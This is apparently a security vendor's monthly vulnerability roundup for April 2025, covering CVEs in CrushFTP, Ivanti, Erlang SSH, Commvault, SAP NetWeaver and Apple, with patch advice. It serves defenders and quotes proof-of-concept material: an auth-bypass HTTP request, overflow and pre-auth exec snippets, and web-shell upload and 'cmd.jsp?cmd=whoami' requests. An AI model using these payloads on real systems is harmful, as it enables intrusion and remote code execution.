Take a Product Tour Request a Demo Cybersecurity Assessment Contact Us

Blogs

The latest cybersecurity trends, best practices, security vulnerabilities, and more

The Bug Report - April 2025 Edition


Figure 1: Common Vishing Techniques

Why am I here?


Ah, spring. The season of blossoms, allergies, and — apparently — auth bypasses, remote code execution, and buffer overflows is in full bloom.

Welcome to The Bug Report – April 2025 Edition, where we roll up our sleeves, grab our metaphorical mop buckets, and try to scrub some sanity back into our digital lives.

This month, the cybersecurity world is tracking mud through every corner of your infrastructure:

CrushFTP lets attackers stroll in with a forged cookie and admin dreams. Ivanti took “stack overflow” a little too literally, spraying memory like it's pollen.

Erlang SSH servers handed out RCE like Easter eggs. Commvault? It unpacked ZIPs like a curious raccoon unzipping your tent at 3 a.m.

And let’s not forget Apple, whose media parser tried to handle spring break videos and faceplanted into a memory corruption bug.

We’re here because you can’t Marie Kondo your way out of a zero-day. So instead, we’ll walk you through this month’s dirtiest CVEs — complete with PoCs, mitigation advice, and just enough dry humor to get you through the patch window.

So open those windows (firewalled, of course), let in the fresh air, and get ready to sweep out the threats before they settle in. Because spring is for cleaning — not rebuilding your network from backups.

CVE-2025-0618 Trellix Endpoint Security HX, Persistent Denial of Service
CVE-2025-31161 CrushFTP, Authentication Bypass
CVE-2025-22457 Ivanti Connect Secure VPN, Remote Code Execution
CVE-2025-24859 Apache Roller, Session Management
CVE-2025-32433 Erlang OTP SSH, Remote Code Execution
CVE-2025-31200 Apple IOS/IPadOS/TvOS/VisionOS/MacOS, Memory Corruption
CVE-2025-34028 Commvault Command Center Innovation Release, Path Traversal
CVE-2025-31324 SAP NetWeaver Visual Composer, Unauthorized File Upload

Get your brooms out!



CVE-2025-0618 – Trellix Endpoint Security (HX): When One Dust Bunny Breaks the Vacuum


What is it?


Even in the tidiest homes, the occasional mess comes from within. So let's start with some housekeeping.

CVE-2025-0618 affects Trellix Endpoint Security (HX) Server versions 10.0.2 and earlier, where a specially crafted tamper protection event can trigger a persistent denial-of-service in the HX service itself.

In plain English: one funky event causes HX to choke on an unhandled exception. The result? Tamper protection events will not process further — permanently — even after a reboot. It’s like throwing one broken sock into the dryer and watching it refuse to run ever again.

There’s no active exploitation or public PoC as of writing, but this is the kind of bug that attackers love: a stealthy way to blind security tools before the real intrusion begins.

Your HX breaking down because of one bad event? Time for a spring patch.
Your HX breaking down because of one bad event? Time for a spring patch.


Who cares?


Anyone running Trellix HX 10.0.2 or older — especially in environments where endpoint tampering could be part of an attacker’s lateral movement or persistence strategy.

This isn’t a code execution bug. It’s subtler. It breaks one of your core detection lanes and stays broken. A compromised endpoint that can no longer scream when it’s being tampered with? That’s a red team dream


What can I do?


Patch it like it’s spring: Upgrade to HX Server 10.0.4!

  • How to check? Go to Admin → Appliance Settings and look for your version at the bottom.

Need help? Follow the HX 10.x System Administration Guide on the Trellix Product Docs site.

Bonus tips:

  • Set up alerting for missing HX events, not just received ones
  • Cross-reference with your SIEM to flag silent or non-reporting agents
  • Build a habit of auditing HX behavior after maintenance or alert suppression


CVE-2025-31161 – CrushFTP: The AWS Header That Opened Pandora’s Box


What is it?


Think of this as the ultimate identity theft hack—except instead of phishing emails, it’s just an HTTP header and a cookie that look kinda right. CVE-2025-31161 is a critical auth bypass in CrushFTP (10.0.0–10.8.3 and 11.0.0–11.3.0) that lets attackers impersonate any user, including the all-powerful crushadmin.

This all hinges on a flawed interpretation of AWS4-HMAC-SHA256 Authorization headers, where CrushFTP goes: “You look trustworthy enough. Come on in.”

Exploitation has been confirmed.

  • Huntress saw active breaches in 4 organizations as early as March 30.
  • The Shadowserver Foundation honeypots picked it up on March 31.
  • Attackers even patched compromised servers to hide their tracks (Talk about rude houseguests!).
CrushFTP evaluating Authorization headers: ‘Close enough.’
CrushFTP evaluating Authorization headers: ‘Close enough.’


Who cares?


If your business moves files with CrushFTP, especially in sensitive sectors ( looking at you: finance, health, gov), you’re on thin ice. The existence of a publicly available PoC could increase exploitation attempts.

None

GET /WebInterface/function/?command=getUserList&c2f=1111 HTTP/1.1
Cookie: CrushAuth=1743113839553_vD96EZ70ONL6xAd1DAJhXMZYMn1111
Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/



🧠 Why this works:

  • The Authorization value triggers a logic flaw that sets anyPass=true
  • The CrushAuth cookie? It’s not even validated, just pattern-matched
  • Boom. You’re crushadmin now. Hope you brought snacks.

What can I do?


Update Immediately

  • 10.x: Upgrade to 10.8.4
  • 11.x: Upgrade to 11.3.1
  • Enable automatic updates

On Windows, rename .jar_tmp files if necessary. Audit for suspicious users (e.g., long GUIDs, crushadmin2), and logs containing AWS4-HMAC-SHA256, changed config files, and unrecognized .dll or .jar files.

Proactively, admins may consider disabling the default crushadmin, enforcing MFA, and restricting admin access via IP allowlists.



CVE-2025-22457 – Ivanti: Buffer Overflow in the Fast Lane


What is it?


Ever seen someone squeeze a clown car's worth of digits into a tiny field? That’s what CVE-2025-22457 does. A stack-based buffer overflow in Ivanti ICS/IPS/ZTA appliances lets attackers send a long, numeric X-Forwarded-For header to overwrite memory and hijack execution flow — all without authentication.

The kicker? You can only use digits and periods. Yet attackers still brute-forced ASLR and ran remote code like it was Sunday brunch.

Google Threat Intelligence Group attributed exploitation of this vulnerability to a China-nexus APT. Ivanti silently patched it in February (and attackers reverse-engineered it in March)


Who cares?


If you’re still on:

  • ICS < 22.7R2.6
  • IPS < 22.7R1.4
  • ZTA < 22.8R2.2

…it’s open season on your network gateway. 

There’s a publicly available POC by Rapid7’s Stephen Fewer. The exploit brute-forces a 512-entry ASLR pool while heap spraying Ivanti’s memory like it’s a graffiti wall in the 90s.

None

#Relevantexploitflow
buffer='1'*622
buffer+=[
  0x31313131,# EBX
  0x32323232,# ESI
  0x33333333,# EDI
  0x34343434,# EBP
  0x35353535,# EIPplaceholder(notactuallyhithere)
  0x39393930  # [ebp+8]→heapspraytriggeraddress
].pack('V*')
http_request=<<~EOF
GET/HTTP/1.1
Host:vulnerable-ivanti.example.com
X-Forwarded-For:#{buffer}
EOF

socket.send(http_request)



🚧 Where’s the bug?

In the /home/bin/web binary, the server uses strlcpy() to copy the X-Forwarded-For header into a fixed-length char buff50[50]. But there’s no bounds checking — so if you send 622 digits (only 0123456789.), the buffer spills into adjacent stack memory.

The field is sanitized to accept only characters common to IP addresses. But with some clever ASCII choices and struct layout predictions, that’s just enough to:

  • Overwrite return pointers.
  • Manipulate ctx structure.
  • Control processCookieHeader() logic.

Since Ivanti uses multiple child web processes (based on CPU cores), the PoC opens 1000+ connections, flooding the heap with controlled patterns. Then it brute-forces the base of libdsplibs.so (ASLR has ~9 bits entropy → ~512 guesses).

If successful, a reverse shell connects back to the attacker, or any arbitrary command is executed with root privileges on the appliance.

Just gonna hang this shell rightttt here.
Ivanti's 50-byte buffer when 622 bytes show up: 'More room in here somewhere, right?' 🤡🚗


What can I do?


Patch immediately. Ivanti provided fixes for this in February 2025.

  • Ivanti Connect Secure: Update to 22.7R2.6 or later (released Feb 11, 2025).
  • Ivanti Policy Secure: Patch to 22.7R1.4 (due April 21, 2025).
  • Ivanti ZTA Gateways: Update to 22.8R2.2 (due April 19, 2025).
  • Pulse Connect Secure: Deprecated. Migrate to supported Ivanti platforms immediately.

Run Ivanti’s Integrity Checker Tool (ICT) and regularly scan for indicators of compromise. Monitor web server crash logs and suspicious restart events. If your ICT result shows signs of compromise, you should perform a factory reset on the appliance and then put the appliance back into production using version 22.7R2.6.

Pulse Secure has reached End-of-Support. Migration is not optional—mitigating this and future vulnerabilities is mandatory.



CVE-2025-24859 – Apache Roller: The Session That Wouldn’t Die


What is it?


You changed your password. You’re safe, right? Wrong.

CVE-2025-24859 is the session version of a horror movie monster. Apache Roller (pre-6.1.5) lets attackers stay logged in even after a password change, thanks to improper session invalidation. An attacker would need to use an old session to access a vulnerable account.

No complex exploits. No zero-days. Just bad session management hygiene. No active exploitation reported — yet. But if you’re not patching, you’re rolling the dice.

Changing your password, but the attacker’s session still lives: ‘You
      thought I was gone?’
Changing your password, but the attacker’s session still lives: ‘You thought I was gone?’


Who cares?


Apache Roller is used in many organizations for internal or semi-public blogging platforms. If your users reuse passwords, access from untrusted devices, or have anything worth stealing, this is your problem. 

Passive persistence could be an impact of this vulnerability. Once in, attackers stay in until the server goes full amnesia on their session ID. That won't happen until you patch to 6.1.5.


What can I do?


Upgrade Apache Roller: The primary remediation is to upgrade your Apache Roller installation to version 6.1.5 or later. This version contains the fix for the session management vulnerability.



CVE-2025-32433 – Erlang SSH: Execute Me, Maybe?


What is it?


CVE-2025-32433 is what happens when your SSH server throws a backdoor party and forgets to ask for ID. It’s a missing authentication bug in Erlang’s SSH daemon that lets attackers send a CHANNEL_REQUEST with an exec command before authentication completes.

Yes, really.

The existence of a publicly available POC could enable threat actors to start scanning for vulnerable systems and exploiting them.

Python

import socket
import struct
import time
 
HOST = "127.0.0.1"  # Target IP (change if needed)
PORT = 2222  # Target port (change if needed)
 
# Builds SSH_MSG_CHANNEL_REQUEST with 'exec' payload
def build_channel_request(channel_id=0, command=None):
    if command is None:
        command = 'file:write_file("/lab.txt", <<"pwned">>).'
    return (
        b"\x62"
  # SSH_MSG_CHANNEL_REQUEST
        + struct.pack(">I", channel_id)
        + string_payload("exec")
        + b"\x01"  # want_reply = true
        + string_payload(command)
    )
 
# ... (rest of the POC)



How the PoC works:

  • Sends an SSH banner: Triggers version exchange
  • Crafts a minimal SSH_MSG_KEXINIT: Bypasses full negotiation
  • Sends SSH_MSG_CHANNEL_OPEN for session channel
  • Sends SSH_MSG_CHANNEL_REQUEST with exec:
    • Command: file:write_file("/lab.txt", <<"pwned">>).

Why Erlang executes this:

The OTP implementation assumes that once a channel is open, exec requests are tied to a valid session — but this isn't validated. Thus, remote attackers send a pre-auth command and Erlang obliges.

This script just sweet-talks the SSH server into writing a file. Imagine what else it could sweet-talk it into doing! If you value your server's obedience to you, patch this pronto.

SSH server when attackers whisper 'exec' before login: ‘Yeah, sure, go
      right in.’
SSH server when attackers whisper 'exec' before login: ‘Yeah, sure, go right in.’


Who cares?


Anyone using Erlang/OTP in network-exposed environments (think RabbitMQ, distributed Elixir services, etc.) is vulnerable if running:

  • OTP < 27.3.3
  • OTP < 26.2.5.11
  • OTP < 25.3.2.20

What can I do?


Apply Patches: The most critical remediation step is immediately upgrading Erlang OTP to one of the fixed versions: OTP-27.3.3, OTP-26.2.5.11, or OTP-25.3.2.20. These versions contain the necessary security fixes to address the vulnerability. Follow the official Erlang OTP upgrade documentation for your specific environment.

Temporary Workaround (If Patching Cannot Be Immediately Performed):

  • Disable SSH Server: If the SSH service is not essential, consider temporarily disabling it on the affected systems. This will prevent any potential exploitation via the SSH protocol.
  • Implement Firewall Rules: If disabling SSH is not feasible, restrict access to the SSH port (typically TCP port 22) by implementing strict firewall rules. Allow connections only from trusted and necessary IP addresses or networks.


CVE-2025-31200 – Apple OSes: A Byte Too Far


What is it?


This one’s a memory corruption bug buried in Apple’s media processing pipeline. CVE-2025-31200 affects iOS, iPadOS, macOS, tvOS, and visionOS, allowing a maliciously crafted media file to trigger arbitrary code execution.

Imagine watching a video or opening an image, and it launches a payload instead of a Pixar short. You might be exposed if you’ve got autoplay enabled or open media files from emails/messages.

Apple confirmed in-the-wild exploitation— likely in targeted attacks against high-profile individuals.


Who cares?


This affects nearly every modern Apple device, especially those not yet running macOS Sequoia 15.4.1+, iOS/iPadOS 18.4.1+, tvOS 18.4.1+, visionOS 2.4.1+

No PoC has been released publicly, but Apple’s advisory confirms active exploitation in the wild.


What can I do?


Apply Patches: The primary and most critical remediation step is to update your Apple devices to the latest versions where this vulnerability has been addressed. This includes:

  • tvOS 18.4.1 or later for Apple TVs.
  • visionOS 2.4.1 or later for Apple Vision Pro.
  • iOS 18.4.1 and iPadOS 18.4.1 or later for iPhones and iPads.
  • macOS Sequoia 15.4.1 or later for Macs. 

Ensure all eligible devices are promptly updated to these versions to mitigate the risk.



CVE-2025-34028 – Commvault Command Center: ZIP It and Rip It


What is it?


It’s like RCE-by-UPS. CVE-2025-34028 lets attackers send a ZIP file, write it into any directory, and execute malicious code from a public web folder — no auth needed. Just path traversal, Tomcat, and a .jsp shell.


Who cares?


If you’re running Commvault Innovation Release 11.38.0 – 11.38.19, you’re toast! LTS versions are safe (for now).
The awesome folks at watchTowr Labs published a full PoC .

Python

import requests
import base64
import random
import string
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

 
# ... (part of the POC showing the upload request)
 
upload_url = f"{args.url}/commandcenter/deployServiceCommcell.do" upload_url = f"{args.url}/commandcenter/deployServiceCommcell.do"
upload_headers = {"Content-Type" : "multipart/form-data; boundary=------------------------FmGJxvg3mB7iaQevvO5qVW"}
upload_data = f"--------------------------FmGJxvg3mB7iaQevvO5qVW\r\nContent-Disposition: form-data; name=\"servicePack\"\r\nContent-Type: text/plain\r\n\r\n/../../../Reports/MetricsUpload/{random_path}/\r\n--------------------------FmGJxvg3mB7iaQevvO5qVW\r\nContent-Disposition: form-data; name=\"file\"; filename=\"file.zip\"\r\nContent-Type: application/octet-stream\r\n\r\n{latin1_string}\r\n--------------------------FmGJxvg3mB7iaQevvO5qVW--\r\n"
requests.post(upload_url, headers=upload_headers, data=upload_data, verify=False)
 
# ... (part of the POC showing the shell execution)
shell_url = f"{args.url}/reports/MetricsUpload/{random_path}/.tmp/dist-cc/dist-cc/shell.jsp"
requests.get(shell_url, verify=False)



They're essentially sliding a malicious ZIP file right under Commvault's nose and then telling it to execute the contents. The PoC unpacks it directly into the Reports web directory, and opens up a shiny new .jsp shell. Zero-click, zero-auth RCE via file upload and traversal. Send a ZIP, get a shell in return. No refunds.

Special delivery! (Also, please unpack and execute it, thanks.)
Special delivery! (Also, please unpack and execute it, thanks.)

What can I do?


If you don't want your Commvault server suddenly moonlighting as a command-and-control center, you know what to do (hint: it involves patching).

Apply Patches Immediately: Upgrade to Commvault Command Center Innovation Release version 11.38.20 or later.

Isolate Affected Systems: If patching isn't immediate, isolate the Commvault Command Center from external network access.



CVE-2025-31324 – SAP NetWeaver Visual Composer: Metadata Mayhem


What is it?


Imagine leaving your back door wide open, and someone walks in to hang a malicious painting on your wall — except the painting is a web shell, and your house is a high-value SAP deployment.

CVE-2025-31324 is a critical unauthorized file upload vulnerability in SAP NetWeaver Visual Composer. The /developmentserver/metadatauploader endpoint fails to enforce authentication or authorization, allowing attackers to upload and execute arbitrary .jsp files — no credentials required.

Multiple PoCs have been made publicly available. One PoC demonstrates a weaponized upload. A raw POST request uploads a malicious cmd.jsp file using multipart form data. The server accepts it blindly:

None

POST /developmentserver/metadatauploader?CONTENTTYPE=MODEL&CLIENT=1 Content-Disposition: form-data; name="file"; filename="cmd.jsp"



The body includes Java code that executes system commands passed via the cmd parameter. Once uploaded, the attacker can access it via:

None

GET /irj/cmd.jsp?cmd=whoami



This GET request is not included in the original PoC but reflects the expected method of payload execution once the shell has been uploaded. The /irj/ path is commonly used in SAP NetWeaver to host user-deployed resources, including malicious JSPs planted this way.

This vulnerability is already being exploited in the wild, with attackers planting persistent backdoors via JSP shells, enabling full system compromise.

Just gonna hang this shell rightttt here.
Just gonna hang this shell rightttt here.


Who cares?


If you run SAP NetWeaver 7.xx with Visual Composer enabled, this is your mess to clean up. SAP's own non-public guidance says: check the VCFRAMEWORK.SCA component — if it's present, you're vulnerable. If it's not, you might’ve dodged a bullet.

Organizations using SAP for finance, HR, logistics, or government functions could be looking at a full system compromise if this isn’t handled yesterday.


What can I do?


Patch with urgency: Update immediately with SAP Security Note #3594142, which provides hotfix support packages. Also review SAP Notes #3596125 (FAQ),  and #3593336 (workaround options for unpatched systems).

  • Disable Visual Composer if not actively used (SAP Note #3593336 “option 0” workaround)
  • Restrict public access to /developmentserver/metadatauploader
  • Hunt for unusual .jsp, .java, or .class files in:
    • C:\usr\sap\<SID>\<InstanceID>\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\root
    • .../work
    • .../sync
  • Check your system using: http://host:port/nwa/sysinfo → Look for VCFRAMEWORK.SCA

Trellix Customers:  A Trellix Intrusion Prevention System (IPS) Emergency User Defined Signature (UDS) has been created to detect this threat. The UDS and its Release Notes are available for download from Trellix Intrusion Prevention System User-Defined Signature releases. Please refer to Thrive Support Portal Article Number 000014484 to download the UDS and apply it in your Trellix IPS environment

Discover the latest cybersecurity research from the Trellix Advanced Research Center: https://www.trellix.com/advanced-research-center/

This document and the information contained herein describes computer security research for educational purposes only and the convenience of Trellix customers.

Get the latest

Stay up to date with the latest cybersecurity trends, best practices, security vulnerabilities, and so much more.
Please enter a valid email address.

Zero spam. Unsubscribe at any time.